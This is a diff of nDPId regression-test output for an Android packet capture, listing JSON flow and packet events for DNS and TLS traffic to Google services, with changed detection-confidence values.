+00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":176,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","server_names":"*.google-analytics.com,*.fps.goog,app-measurement.com,fps.goog,google-analytics.com,googleoptimize.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googleoptimize.com,www.googletagmanager.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google-analytics.com","alpn":"http\/1.1","fingerprint":"B0:D9:D3:57:C2:34:87:2C:FB:F5:E6:BD:7F:9F:54:65:08:61:AF:01"}} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454870649,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454870649,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2dAAEAG9TTAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9uQgAAAgQFtAQCCAr\/\/zZYAAAAAAEDAwg="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1582454870996,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454870996,"pkt":"xiwDYGpkTGr2n\/YnCABFAABIq6dAAEARCZzAqAIQwKgCAY8FADUANFCq5z4BAAABAAAAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1582454870998,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1582454870998,"pkt":"TGr2n\/YnxiwDYGpkCABFAABYgb0AAEARc3bAqAIBwKgCEAA1jwUARA+05z6BgAABAAEAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454870998,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454870998,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871042,"flow_last_seen":1582454871042,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871042,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1582454871042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871042,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA83wxAAEAGmY\/AqAIQ2O8meIDaAbu5DOmwAAAAAKAC\/\/8p0AAAAgQFtAQCCAr\/\/za8AAAAAAEDAwg="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1582454871051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871051,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq69AAEARCZvAqAIQwKgCAX6cADUALTLn3DQBAAABAAAAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAQ=="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1582454871056,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871056,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA84WAAAHcGoDvY7yZ4wKgCEAG7gNr8u4aauQzpsaAS6yCywwAAAgQFZAQCCAqJFH+\/\/\/82vAEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1582454871057,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871057,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA03w1AAEAGmZbAqAIQ2O8meIDaAbu5DOmx\/LuGm4AQAVfLBwAAAQEICv\/\/Nr+JFH+\/"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1582454871058,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1582454871058,"pkt":"MzMAAAACTGr2n\/Ynht1gAAAAABA6\/\/6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAChQAIygAAAAABAUxq9p\/2Jw=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1582454871061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1582454871061,"pkt":"xiwDYGpkTGr2n\/YnCABFAABGq7FAAEARCZTAqAIQwKgCAR3sADUAMs+l\/agBAAABAAAAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQAB"} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871069,"flow_last_seen":1582454871069,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871069,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454871069,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871069,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8\/AdAAEAGfJTAqAIQ2O8meIDcAbs4lMrFAAAAAKAC\/\/\/JKwAAAgQFtAQCCAr\/\/zbCAAAAAAEDAwg="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871075,"flow_last_seen":1582454871075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -172,81 +173,81 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454871088,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871088,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8Nk0AAHcGS0\/Y7yZ4wKgCEAG7gN4gvysUCa7yzaAS6yD0TQAAAgQFZAQCCApclUhu\/\/82xAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454871089,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871089,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0xAlAAEAGtJrAqAIQ2O8meIDeAbsJrvLNIL8rFYAQAVcMkgAAAQEICv\/\/NsdclUhu"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1582454871090,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871090,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRSjQAAEARqwbAqAIBwKgCEAA1fpwAPWeH3DSBgAABAAEAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAQMABK3CT3I="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871090,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871090,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871094,"flow_last_seen":1582454871094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871094,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454871094,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871094,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8RuFAAEAGM+7AqAIQrcJPco\/iAFBu6HAoAAAAAKAC\/\/\/iBQAAAgQFtAQCCAr\/\/zbJAAAAAAEDAwg="} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1582454871100,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1582454871100,"pkt":"TGr2n\/YnxiwDYGpkCABFAABWpmUAAEARTtDAqAIBwKgCEAA1HewAQssi\/aiBgAABAAEAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQABwAwAAQABAAABKwAErNkVyg=="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454871100,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454871100,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871103,"flow_last_seen":1582454871103,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454871103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871103,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ApdAAEAGssnAqAIQrNkVysrYAbsvYjRcAAAAAKAC\/\/9bhgAAAgQFtAQCCAr\/\/zbLAAAAAAEDAwg="} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871075,"flow_last_seen":1582454871103,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871042,"flow_last_seen":1582454871105,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871105,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 